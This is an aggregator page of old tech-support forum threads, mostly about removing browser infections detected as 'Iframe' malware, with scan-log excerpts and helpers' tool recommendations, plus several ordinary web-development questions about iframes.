Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 10.7.2
Run by Michael at 13:23:47 on 2012-11-30
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.6135.3421 [GMT -6:00]
.
AV: ESET NOD32 Antivirus 5.2 *Enabled/Outdated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 5.2 *Enabled/Outdated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.ex... Read more

A:Sirefef and HTML/Iframe.B.Gen Virus

 attach.txt   14.66KB
  5 downloads

Read other 15 answers
RELEVANCY SCORE 50.8

Hello to all members,

We are running gate automation website. One of our clients called us 3 days back that when he clicked on our website, he gets this error message about html iframe.b.gen virus..I have attached the screenshot for reference.

I have used some online tools to check our website and results show that there are no issues. Also, no one else has called us for this virus attack. So, I am not sure whether this virus is on our website or it is on client's computer.

According to mcafee.com, This threat could be delivered via web pages which were compromised as a result of an SQL injection attack. It may also be received as a result of poor security practices, or un-patched machines and vulnerable systems.

What I have understood from this is..it could be our website or it could be the client's computer..Am I correct?? Can anyone please suggest how can I check if this is an issue on our side or not?? If yes, then how can I resolve this? Thanks

A:A user got Html iframe.b.gen virus on our website

Can anyone please reply to this post?? Thanks

Read other 2 answers
RELEVANCY SCORE 50.8

I appear to have an infected computer. Please advise me as to what I should do.

I learned that my gmail account was hacked. It had been accessed via a mobile device from another country and used to send spam. I follwed the instructions on Google to secure my account. Then I ran a boot-time virus scan on my home PCs using Avast! Free Antivirus. On one of my PCs it found 3 infections, all in HTML files. I let Avast delete the files. They were:

HTML:Iframe-inf
JS:Downloader-APK[Trj]
JS:Redirector-JM[Trj]

I started to copy my files to an external drive as backup. I discovered a file that interfered with the copy. I googled it and found that itappears to indicate malware:

usrusmt2.tmp

Aside from finding these four files I've not experienced any problems with the computer. It's not running slowly or displaying popups or redirecting my home page.

I am using Windows XP Professional SP3. I run the automatic update and apply all security patches. I use the Windows firewall and Avast!Free Antivirus.

Thank you for your help.

A:Virus: Downloader/redirector/iframe/usrusmt2.tmp

Try running SUPERAntiSpyware (http://www.superantispyware.com/)(Update First), and MalwareBytes (http://www.malwarebytes.org/)

Read other 4 answers
RELEVANCY SCORE 49.6

Hi guys,

This is my first time posting here. I appreciate if anyone would help me out, since I am extremely stressed out that this virus won't disappear at any cost, even though I used Antivirus and antimalware such as Malwaresbytes Anti Malware, etc..

I work in web design firm therefore generally work through websites....however, since this frustrating and unforgiveable chura.pl.rc virus thing that always embed themselves in iframe codes in almost every webpages that I have in my computer...I can't stand removing millions of all of them in every webpages..thus reducing my time and effort also..it makes me nuts! because I design web sites for clients and I don't want to cause mayhem or issues to clients (or firm who is interested to contract me)

Also..I was worried that this Virut thing has almost infected exe files,more importantly I dont want this nasty bug get through my dependable Adobe Creative Suite applications in which I use it regularly..
only a few small programs got infected, that time I fired up DrWeb Cure it! to save the world. Still though, the problem is the virus still stays.

anyone can help me out with trusty, clever way or trick to remove these two annoying viruses??

Is it true that reinstall windows won't solve the problem as long as the virus would get back again?? so that means I need to wipe or clean the hard drive back to the original as new ?? How??

Immediate solution appreciated! Thanks.
 

A:HELP! Stressed and annoyed with virus - Win32/Virut and chura.pl.rc iframe

Hi artaholic and Welcome to TSG!
With Win32.Virut virus.. Dr Web and other AV applications attempt to fix it but most of us feel it's a lost cause. You can spend days on trying to fix the damage and still not know if it's really ever been fixed and you'll never be able trust your computer. You can read about it at: http://miekiemoes.blogspot.com/2009/02/virut-and-other-file-infectors-throwing.html

The best thing to do is backup your data, mail, pictures, etc. and FDISK, FORMAT, and re-install Windows. But make sure your backed ups are not infected... What version of windows do you have?
 

Read other 3 answers
RELEVANCY SCORE 49.2

Beginning 3/25 I started receiving virus alerts from Avira AntiVir Personal. Here is the first one:

<< Virus or unwanted program 'HTML/IFrame.DO.54 [virus]'
detected in file 'C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\EP52U43K\obana[9].htm.
Action performed: Deny access >>

This was also detected in certain other random recent directories under Content.IE5. Some of them appear to be accumulating junk -- css files, jpegs, html files -- from web sites I have never visited.

Please note: I do not use Internet Explorer! I use Firefox. So, there may be some malware downloading junk in the background.

Thank you!

*

.
DDS (Ver_2011-08-26.01) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by pointdextrous at 15:04:05 on 2012-03-27
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.2047.1321 [GMT -4:00]
.
AV: AntiVir Desktop *Enabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
svchost.exe
C:\Program Files&#... Read more

A:Infected with 'HTML/IFrame.DO.54 [virus]'; IE temp dirs fill with junk

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps.===Download ATF Cleaner by Atribune from here hereand save it to your Desktop. Follow the instructions for the browser you use.Read the instructions about the cookies. Delete what you do not need.Double click ATF-Cleaner.exe to run the program. Check the boxes to the left of: Windows Temp Current User Temp All Users Temp Temporary Internet Files *Prefetch (Windows XP) only.Java CacheThe rest are optional - if you want to remove the lot, check "Select All". Finally click Empty Selected. When you get the "Done Cleaning" message, click OK. If you use the Firefox or Opera browsers, you can use this program as a quick way to tidy those up as well. When you have finished, click on the Exit button in the Main menu. For Technical Support, double-click the e-mail address located at the bottom of each menu. * The purpose of Prefetch folder is to increase the speed at which you can access the programs that you use on your PC. Unfortunately, Windows doesn't differentiate between a program you use every day and one you use every blue moon, which means that it may be prefetching a lot of stuff that you rarely use, adding to your startup time. You may find that the first time you boot up after cleaning out this folder, your PC takes longer to get into gear - the ... Read more

Read other 4 answers
RELEVANCY SCORE 48

Hi,Been dealing with Trend Micro for a week now without any resolution. They're unable to identify the problem but have been treating it like it's virtumode (using vundofix) without much success. I've tried cleaning both as administrator or in safe mode (running W2K 5.00.2195 with SP4 I believe). Started with my broswer crashing, then dialog boxes popping up when IE launched. They said I had been exposed to Bloodhound virus and then opened up a website like WinFixer does (naturally, they could fix it for the small price of...). Anyway, long story short, As I've spend about 15 hours chasing this problem this week, I've run numerous AV, anti-spyware, and registry cleaner programs. I successfully delted two files today qopnk.dll and tustu.dll. Any help would sure be appreciated.Logfile of HijackThis v1.99.1Scan saved at 11:24:21 PM, on 4/28/2006Platform: Windows 2000 SP4 (WinNT 5.00.2195)MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)Running processes:C:\WINNT\System32\smss.exeC:\WINNT\system32\winlogon.exeC:\WINNT\system32\services.exeC:\WINNT\system32\lsass.exeC:\WINNT\system32\svchost.exeC:\WINNT\system32\spoolsv.exeC:\WINNT\System32\svchost.exeC:\WINNT\System32\nvsvc32.exeC:\PROGRA~1\TRENDM~1\INTERN~1\PcCtlCom.exeC:\WINNT\system32\regsvc.exeC:\WINNT\system32\MSTask.exeC:\PROGRA~1\TRENDM~1\I... Read more

A:Elusive Virus: Virtumonde, Trojan.swfdl.a, Exploit.iframe.vulnerability, [email protected]

Hi netcentricusa and Welcome to the Bleeping Computer!Lets try using F-Secure Blacklight and have a closer look.Download and Save Blacklight to your Local Drive C:\Click Start-> Run-> Type in C:\blbeta.exe /expert and click OK to launch Blacklight.Accept the Agreement and Click Next,now click Scan and let Blacklight scan the entire system.You'll see a list of all items found. There will also be a log on your C:\ drive with the name fsbl.xxxxxxx.log (the xxxxxxx stand for numbers).Copy and paste this log in your next reply. Don't choose the rename option yet! I want to see the log first, because legitimate items can also be present there, such as "wbemtest.exe"Let me see a HijackThis Start Up log.Open HijackThis and Click the "Open Misc Tools Section" tab.Select Generate StartUpList log and make sure that both Boxes beside it are checked:Put a check by:List all minor sections(Full)andList Empty Sections(Complete)It will produce a NotePad Page,I need you to copy the entire contents of that page to the next reply.Post those 2 logs in the next reply please.

Read other 3 answers
RELEVANCY SCORE 38.8

Still I frame. I have an Iframe on my site and I wanted to show only a certain part of the site inside it and unscrolable too. Can I tell the browser(s) to do this? and how. Please help.
 

A:Still Iframe - Please Help

Read other 12 answers
RELEVANCY SCORE 38.8
Q: iframe

How do clear the iframe in netscape 7.0 and Internet explorer. The following code works in IE but not in netscape

<html>
<head>
<title>Simple Math Practice</title>


<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;
}

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');
}

function WriteContent() {
problem.document.write("this is content");
}

function WriteFooter() {
problem.document.write("<\/body><\/html>");
}

function ClearFrame() {
problem.document.open();
problem.document.clear();
}

function CloseFrame() {
problem.document.close();
}


// End Hiding Script -->
</script>


<link href="math.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center">
<h1>Simple Math Practice</h1>

<iframe
src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width=&quo... Read more

A:iframe

That function is no longer supported. See here:
http://www.web-developer-india.com/web/jscript/refp_77.html
 

Read other 1 answers
RELEVANCY SCORE 38.8

I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!
 

A:IFrame help

post the sites url and I will check out the code....... if I can see it.

d.
 

Read other 2 answers
RELEVANCY SCORE 38.4

ok.... so what i want to do is have an iframe over top of an image (which i have figured out), but then, i want that iframe to have a lower opacity so that you can kind of see the picture that the iframe is over top of. i've read a ton of stuff about transparency and opacity and i've tried a few different things, none seem to work though. i've been able to change the opacity of the iframe fine, but rather than having my image come through, the bg color (which is black) comes through.

please help and thanks in advance

carson

ps - think of it like a layer in photoshop where you can just change the opacity to have the layer behind it show through.
 

A:Need help with iframe opacity...

well I am not too sure, but I think you would have to change the alpha opacity in the code for the page within the iframe. So if your iframe is linkted to "pagename.htm" then you have to use alpha opacity on the "pagename.htm" page, as opposed to the page including the iframe. However, I may be way off track on this one! This is all I can offer is an idea...
 

Read other 2 answers
RELEVANCY SCORE 38.4

Avast antivirus is reporting that a number of files have been infected with a trojan called "IFrame-HW [Trj]". It seems to move around to different files, I use Windows Vista and some of the files infected are in hidden folders which I can no longer seem to access. Also, when I tell Avast to move the files to it's chest or to delete they just seem to come right back, sometimes immediately. I'm not sure what effect it is having on my pc, except Mozilla Firefox will no longer function on my pc, I can only browse the net with IE or Opera.
I have also tried using Cyberscrub to clear my free space after deleting infected files, but when I do so I get constant reports of the infection from Avast and Cyberscrub stops responding.
Any help will be greatly appreciated.
DDS (Ver_09-06-26.01) - NTFSx86
Run by olusanya at 16:37:47.03 on Thu 07/09/2009
Internet Explorer: 8.0.6001.18783
Microsoft? Windows Vista™ Home Premium 6.0.6001.1.1252.1.1033.18.2814.1528 [GMT -4:00]

SP: Spybot - Search and Destroy *disabled* (Updated) {ED588FAF-1B8F-43B4-ACA8-8E3C85DADBE9}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32... Read more

A:Infected with IFrame-HW [Trj]

Pardon me... I left out the fact that it also seems to have disabled the protective mode of IE, leaving it vulnerable.Hello nu2cpu,We ask that once you have posted your log and are waiting, please DO NOT "bump" your thread or make further replies until it has been responded to by a member of the HJT Team. The reason we ask this or do not respond to your requests is because that would remove you from the active queue that Techs and Staff have access to. The malware staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response, there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond.That is why I have made an edit to your last post, instead of a reply. Please do not multiple post here, as that only pushes you further down the queue and causes confusion to the staff.Please be patient. It may take a while to get a response but your log will be reviewed and answered as soon as possible.Thank you for understanding.Regards,The weatherman (Moderator)

Read other 3 answers
RELEVANCY SCORE 38.4

Description of my problem:We determine in our local network an instability, this is due to spread of malware through in it.The malware uses the method of attack based ARP to the local network Gateway (192.168.1.1).Indeed machine "A" owner of the MAC address "MacA" send packages ARP broadcast on the network indicating that the bridge is the machine A (192.168.1.1(the right address of Gateway) is at "MacA"), so many machines in our network used a wrong ARP i(I mean MACA of infected machines by this malware)After a long check on them to identify this malware. we found : these machines were infected by:svchost.exe" (175 KO, 179200 Bytes) uses the DLL Packet.dll and wpcap.dll and wanpacket.dll ... \ drivers \ npf.sys.- There realize a scan of all networks 192.168- and 172.16- and 10.0-- It has a "80-port insert" in the svchost paquet-at last we have another problem; when we open web page (as IE or Firefox) before we get the response and taking two or three seconds, the page displays a little gray bare (even we use windows or Linux system) and the view page source return this hxxp://218.75.91.248/iframe and this are included in the svchost.exe paquet but it was crypted.- Can somebody help me and explain me haw can we resolve this and clean our local network from this malwre? Thank's in advance

A:Iframe And Arp Spoofing

Please can somebody help me, nobody has an idea about this problem ?

Read other 4 answers
RELEVANCY SCORE 38.4

I have a page index.shtml, and there is an iframe in that page. The iframe is called downloadiframe. Now I have a button in my forums that I want to link to my downloads page.

Here's My problem. When you click the "download" button on my page, you go into my downloads page. But I want it to open index.shtml with the downloads page in the iframe, downloadsiframe. How do I do this?
 

A:IFrame Problems

Read other 8 answers
RELEVANCY SCORE 38.4

Hi Folks,From threatpost :New Firefox iFrame Bug Bypasses URL Protections. http://bit.ly/as6VH9CheersKarstenHansen

Read other answers
RELEVANCY SCORE 38.4

I already ran ComboFix before I found the preparation guide saying not to unless instructed - oops.

Iframe.inf infected my sites at Hostgator which they cleaed up overnight. I'm impressed.

Hostgator tech suggested scanning local system using multiple scanners for better results. I use Avast Internet Security and it reported no problems.

Is ComboFix log is enough to tell if infected or do I need to go through all the stuff listed in prep guide.

thanks in advance for any help you can render

ComboFix log below

ComboFix 11-03-11.02 - STAN 03/12/2011 16:09:45.3.1 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.544 [GMT -5:00]
Running from: c:\downloads\Software\ComboFix.exe
AV: avast! Internet Security *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Disabled* {7591DB91-41F0-48A3-B128-1A293FD8233D}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\~DFK69783e.tmp
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\1eaadjc.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\bass.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\engine_vx.dll
c:\doc... Read more

A:Iframe.inf infected - yes or no?

Hello and welcome to Bleeping Computer We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. Please take note: If you have since resolved the original problem you were having, we would appreciate you letting us know. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
If you are unsure about any of these characteristics just post what you can and we will guide you.Please tell us if you have your original Windows CD/DVD available. If you are unable to perform the steps we have recommended please try one more time and if unsuccessful alert us of such and we will design an alternate means of obtaining the necessary information. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review your topic and do their best to resolve your issues. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the '... Read more

Read other 3 answers
RELEVANCY SCORE 38.4

In the last week, my computer has started having issues and restarting randomly.  When I try to maximize some videos on youtube, occasionally the video will only cover 1/3 of the screen and immediately freeze.  Avast said everything was good, but I tried a boot scan anyway; it would pop up and identify some infected files, but when I told it to fix them, it would say those files are no longer there.  I can't find the text file that avast apparently made, but I do remember clickjacker and a frame flashing across the screen.  I'd appreciate any help you could give in clearing this up.  
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.16518  BrowserJavaVersion: 10.51.2
Run by Josh at 0:33:52 on 2014-02-23
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.16382.14153 [GMT -6:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\W... Read more

A:Iframe, clickjacker?

Hi Fajen
My name is polskamachina and I will be assisting you with your malware problems. What follows below are some ground rules for this forum.
I will reply as soon as possible (typically within 24-48 hours). In turn, I ask that you please respond within 72 hours. If you know you will be away longer than that, please let me know.
I am in California at GMT-8 Hours (Pacific Standard Time). If I do not respond to you within 48 hours, feel free to send me a private message.
Some points for you to keep in mind:
Do NOT run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Do not attach logs or use code boxes, just copy and paste the text.
I cannot see your computer. Periodically update me on the condition of your computer, and provide as much detail as you can in every post.
Once things seem to be working again, please do not abandon the thread. I will give an "all-clean" message at the very end.
NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned. You can put them on a CD/DVD, external drive or a flash drive, anywhere except on the computer.
NOTE: It is good practice to copy and paste the instructions into notepad and print them in ca... Read more

Read other 22 answers
RELEVANCY SCORE 38.4

Hi,
I work on portals. In ePhox editLive editor I am using iFrame which in turns diplay a intranet site with in this iFrame. This site includes a selectbox for locations. When site is displyaed first time select box is not visible to end user but when we click on any button and this page again renders this select box is also available.
I right click on site when select doesnt appears but for my surprize code for select box is there in view source. I am not getting why it is not visible if code is there in view source.
Also, When I open this site in internet explorer without any iframe select box is visible there.

Can anyone please help why it is happening like that??

Regards,
Rohit Sharma

Read other answers
RELEVANCY SCORE 38.4

I have just had 3 securtiy alert messages from AVIRA,don't know if it would have any connection :
C:\users\XXXX\AppData\Local\Microsoft\...\b(1).js contains suspiscious code HEUR/HTML. malware, the same version b(2)
and detection pattern of the java script virus JS/Dldr.Iframe.BO
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:04:02, on 22/06/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Windows Live\Family Safety\fssui.exe
C:\Program Files\TalkTalk\bin\sprtcmd.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
C:\Windows\System32\rundl... Read more

A:JS/Dldr.Iframe.BO

Read other 6 answers
RELEVANCY SCORE 38.4

on my site i have a link i use for users to view tax records in my county and i would like to have the users not leave my site,so i used an iframe,but im havin an issue after agreeing to their usage terms,users cannot access the site or it doesnt redirect to the corresponding/next page,as in enter here and i cant bypass it because it will auto redirect. any suggestions WITHOUT using a new page or opening in a new window ??

www.townhousesandvillas.com/taxrecords.html

oh and take it easy on me...im new
 

A:iframe or equal...

Read other 16 answers
RELEVANCY SCORE 38.4

I m tired of searching about iframe alternative ..... after so much search i cant get what i wanted .

I m trying to include other domain HTML page in my HTML based email templates, Is there any other way to include the html pages from other domain in my HTML coding that is other than iframe?
 

Read other answers
RELEVANCY SCORE 38.4

Hello Gracious Help,I run XP Pro on a Pentium 4, 3ghz (Dell GX270).3 days ago, I had my Firefox browser open, but had not used it or been at the puter for about 5 hours. When I sat down at the puter, there were perhaps 10 Avast warning pop-ups within about 15 mins - that said that it had blocked me from opening a malicious site. The trouble was, I was not trying to open any sites at this time. Two of the sites it specified were a beastiality site and a zoo site - neither of which I have ever been to.Avast seemed to block my browser from opening these sites, but my question is - what was directing my browser to go to them in the first place? The Avast warning said that the virus (or malware) that it was protecting me from was HTML:Iframe-infA web search came up with a few complex suggestions on how to rid of fix this problem, but all were too complex for me to follow.The hijacking or redirecting (or whatever it was) has not happened again since. I have had no further Avast warnings over the last 2 days. I first looked for help from the Avast website, and spoke to an IYogi support rep on the phone (whose number I got from the Avast website). He took remote control of my puter, checked my registry and said he could help if I bought a $186.00 support pkge (that provided support for 6 months). In retrospect, the "Help for Avast Free" phone number is just a marketing ploy to sell support packages. I just hope the guy did not add spyware or key loggers (or such... Read more

A:HTML : Iframe - inf

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infection (and attempted browser hijackings or re-direction, or whatever it is).

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.allzoomovies.com/?x=4302&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComO... Read more

Read other 41 answers
RELEVANCY SCORE 38.4

My PC was working very well and had no problem. I turned off after my work one night and when I switched on the next morning it does not open my home page. When I try to open my antivirus Avast gives me warning. The name of the virus is HTML:Iframe-inf Please help me to get rid of this. I am not able to ope my home Page.
More over my system has become very slow especially during the start up. Please help.
Thank you!

Read other answers
RELEVANCY SCORE 38.4

OS: Server 2008 R2 - SP1

IIS: 7.5.7600.16385

I have an iframe embedded into a web page which displays a pdf.  In chrome and other browsers the pdf displays fine inside the iframe; however, in IE the iframe forces a logout after redirecting them several times.  Chrome also does this redirect
but doesn?t end up forcing a logout.  Copying the source url from the iframe into a new tab in IE doesn?t force the logout and retrieves the pdf just fine which means it is directly related to this server?s handling of iframes specifically in all IE browsers
we support (IE 9+).  This scenario is unique to a specific server and doesn?t happen on ?identical? server environments.

I have used Process Monitor and am not seeing any permission errors or anything that immediately stands out.  If you have any thoughts on how to proceed or have any questions, please let me know.
I have also looked into KB 3154070 without success.

Read other answers
RELEVANCY SCORE 38.4

On my site, I have darkish colors; blue, grayish-black, etc. But I have an IFRAME of a page from another site, which has white background and black text, so it doesnt fit in with my page. I already have the CSS for my page colors, can I apply this to the Iframe, or is there another way I can change its background color?

Since the Iframed page is on someone else's site, I can not modify that file itself. And many of you will probably tell me an iframe is not good to use in page design, I have decided its the best way to accomplish what I want.
 

A:Formatting an IFRAME

if you know this person and they're okay with you mirroring their site, you could ask them to use DIV id's and SPAN id's and set their tags to CSS id's that you know of, then name your CSS id's the same. you'd have to put a LINK REL tag in the HEAD and both you and the person who owns the site would need to have it point to CSS in the main directory with the same file name. everything would have to correlate.
 

Read other 2 answers
RELEVANCY SCORE 38.4

I receive frequent emails from my friend's infected computer with random subject lines and random names with his files as an attachment.

Now, the problem is my AVG antivirus and Housecall do not detect any virus in these emails, but pandaactivescan detects this as "Exploit/iFrame".

I have XP pro, IE6 and Outlook express6 and have even installed the patch for this vulnerability that actually affects IE5.5 and IE5.01 only(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp).

IS my computer infected?
 

A:Exploit/iFrame

Read other 9 answers
RELEVANCY SCORE 38.4

Alright here the deal i have a transparent iframe with the content visable but the scrollbars are transparent and i dont want that...so is there anyway to have a transparent iframe with visable content and visable scrollbars?
 

A:Transparent iFRAME

Read other 12 answers
RELEVANCY SCORE 38

I am using an iframe for calling other websites. I want to disable right click in this Iframe. Can anybody help me out in this.
 

A:Help! To disable right click in Iframe

It'll only work for people using IE and I think you'd have to disable it for the whole page and not just the iframe. Plus the IE user would have to have Javascript turned on for it to even work.

Other browsers have options to block you from doing evil stuff like that.

Also, keep in mind that for security reasons, browsers are very picky with what you can do with an iframe if the site loaded in it is not on the same server/domain as the page.
 

Read other 1 answers